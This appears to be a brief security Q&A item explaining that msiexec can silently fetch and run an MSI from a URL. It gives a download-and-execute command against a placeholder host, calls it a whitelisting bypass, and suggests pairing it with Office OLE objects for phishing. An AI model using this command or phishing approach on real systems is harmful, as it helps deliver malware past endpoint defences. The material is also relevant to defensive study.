Can msiexec download and execute an MSI file from a remote server?

Yes, msiexec supports remote installation by specifying a URL in the `/i` parameter, e.g., `msiexec /q /i https://example.com/payload.msi`. This technique bypasses application whitelisting and is similar to how regsvr32 remotely executes SCT files. For phishing, attackers may combine this with OLE objects in Office documents, as described in the research on Penetration Techniques - Parameter Hiding Techniques in Shortcut Files.